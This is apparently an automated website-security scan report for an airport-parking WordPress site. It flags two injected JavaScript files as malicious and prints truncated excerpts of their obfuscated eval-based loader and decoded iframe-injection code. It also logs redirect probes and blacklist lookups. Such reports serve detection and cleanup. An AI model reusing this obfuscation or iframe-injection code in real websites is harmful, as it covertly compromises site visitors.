Scanned pages/files
Request | Server response | Status |
http://iwanttobookairportparking.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 26 Aug 2014 17:59:21 GMT Location: http://www.iwanttobookairportparking.com/ Server: Apache/2.4.9 (Unix) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.iwanttobookairportparking.com/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.iwanttobookairportparking.com/ | 200 OK Content-Length: 14829 Content-Type: text/html | clean |
http://www.zurichairportcarhire.com/jquery.ui.button.min.js | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
http://www.zurichairportcarhire.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.iwanttobookairportparking.com/wp-content/themes/revo1/javascript/tabber.js | 200 OK Content-Length: 21348 Content-Type: text/javascript | malicious |
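Malicious code - confirmed by antiviruses (see below). The scanner prints only truncated excerpts, so neither snippet below is complete.
Obfuscated loader (excerpt). The nested try/catch blocks reference apparently undefined identifiers so that the catch handler runs and aliases eval to e; the numeric array is presumably decoded into the string s (the decoding step is cut from the excerpt), which is then executed through e("if(1)"+s):
try{abre++}catch(a6ba34y){try{sdveesg&3}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101, e("if(1)"+s);
Decoded script (excerpt, truncated in several places). The visible parts define a pseudo-random number generator that derives a value from the hour of a Unix timestamp, and later append an element named ifrm to document.body. This is consistent with injecting an iframe whose target changes over time, although the excerpt does not show how the URL is built:
if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return
Antivirus reports: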
| ||
http://www.airport-parking-shop.co.uk/scripts/affiliate.php?affiliate=1850 | 200 OK Content-Length: 1535 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2.x&key=ABQIAAAAOQDk9h3PM6f9d_nnWXyeCRTTpRreVsYug7bxN2TzHg01H6pS8RQm_dZOUdxsw2UHsU57VGfOogYxnw | 200 OK Content-Length: 5113 Content-Type: text/javascript | clean |
http://www.iwanttobookairportparking.com/wp-content/plugins/google-maps-advanced/googlemapsPlugin.js | 200 OK Content-Length: 19515 Content-Type: text/javascript | malicious |
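Malicious code - confirmed by antiviruses (see below). The scanner prints only truncated excerpts, so neither snippet below is complete.
Obfuscated loader (excerpt). The nested try/catch blocks reference apparently undefined identifiers so that the catch handler runs and aliases eval to e; the numeric array is presumably decoded into the string s (the decoding step is cut from the excerpt), which is then executed through e("if(1)"+s):
try{abre++}catch(a6ba34y){try{sdveesg&3}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,19,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,18,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,93,98,18,30,19,102,89,92,101, e("if(1)"+s);
Decoded script (excerpt, truncated in several places). The visible parts define a pseudo-random number generator that derives a value from the hour of a Unix timestamp, and later append an element named ifrm to document.body. This is consistent with injecting an iframe whose target changes over time, although the excerpt does not show how the URL is built:
if(1)function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = Math.ceil(d.getHours()/3); this.seed = 23456789 document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e) { iframeWasCreated = undefined; } }, 100 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return
Antivirus reports: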
| ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 26 Aug 2014 17:59:21 GMT
Location: http://www.iwanttobookairportparking.com/
Server: Apache/2.4.9 (Unix)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iwanttobookairportparking.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 26 Aug 2014 17:59:21 GMT
Location: http://www.iwanttobookairportparking.com/
Server: Apache/2.4.9 (Unix)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.iwanttobookairportparking.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Referer: http://www.google.com/search?q=iwanttobookairportparking.com
Result:
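The result is similar to the first query, and no suspicious redirects were found. The 302 seen in both cases only points to the www host of the same site. Two probes cannot rule out redirects that trigger only for particular user agents, IP ranges or cookies, so this result does not clear the site on its own.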
GET / HTTP/1.1
Host: iwanttobookairportparking.com
Referer: http://www.google.com/search?q=iwanttobookairportparking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iwanttobookairportparking.com
Result: This site is not currently listed as suspicious. A clean blacklist result does not override the malicious script findings in the scanned-files table above; listings can lag behind an infection.
Query: http://yandex.com/infected?l10n=en&url=http://iwanttobookairportparking.com/
Result: iwanttobookairportparking.com is not infected or malware details are not published yet.
Result: iwanttobookairportparking.com is not infected or malware details are not published yet.